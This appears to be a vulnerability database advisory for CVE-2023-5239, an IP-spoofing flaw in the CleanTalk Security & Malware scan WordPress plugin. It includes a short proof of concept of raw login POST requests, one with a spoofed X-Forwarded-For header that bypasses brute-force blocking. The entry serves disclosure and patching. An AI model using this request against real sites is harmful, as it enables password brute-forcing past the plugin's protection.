Lucene search
Bartlomiej MarekWPEX-ID:1D748F91-773B-49D6-8F68-A27D397713C3HistoryNov 06, 2023 - 12:00 a.m.
Security & Malware scan by CleanTalk < 2.121 - IP Spoofing
2023-11-0600:00:00
Bartlomiej Marek
194
cleantalk malwarescan
ip spoofing
invalid logins
security logs
cleantalk < 2.121
x-forwarded header
0.0005 Low
EPSS
Percentile
17.8%
Description This plugin retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to bypass bruteforce protection.
Send 5 invalid login requests and thus block the IP address.
POST /wp-login.php HTTP/1.1
Host: localhost
Content-Length: 97
Content-Type: application/x-www-form-urlencoded
Cookie: wp-settings-time-2=1692902176; betterlinks_visitor=bl64ece171d4145; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-1=libraryContent%3Dupload%26cats%3Dpop; wp-settings-time-1=1695178741
Connection: close
log=admin&pwd=test&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&testcookie=1
Send login request with X-Forwarded header and spoofed IP address.
POST /wp-login.php HTTP/1.1
Host: localhost
Content-Length: 97
Content-Type: application/x-www-form-urlencoded
Cookie: wp-settings-time-2=1692902176; betterlinks_visitor=bl64ece171d4145; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-1=libraryContent%3Dupload%26cats%3Dpop; wp-settings-time-1=1695178741
Connection: close
X-Forwarded-For: 8.8.8.8
log=admin&pwd=test&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&testcookie=1
Check the logs by visiting /wp-admin/options-general.php?page=spbc&spbc_tab=security_log.Related
cve
cve
CVE-2023-5239
2023-11-27 17:15:08
wpvulndb
wpvulndb
Security & Malware scan by CleanTalk < 2.121 - IP Spoofing
2023-11-06 00:00:00
prion
prion
Design/Logic Flaw
2023-11-27 17:15:00
nvd
nvd
CVE-2023-5239
2023-11-27 17:15:08
cvelist
cvelist
CVE-2023-5239 Security & Malware scan by CleanTalk < 2.121 - IP Spoofing
2023-11-27 16:22:00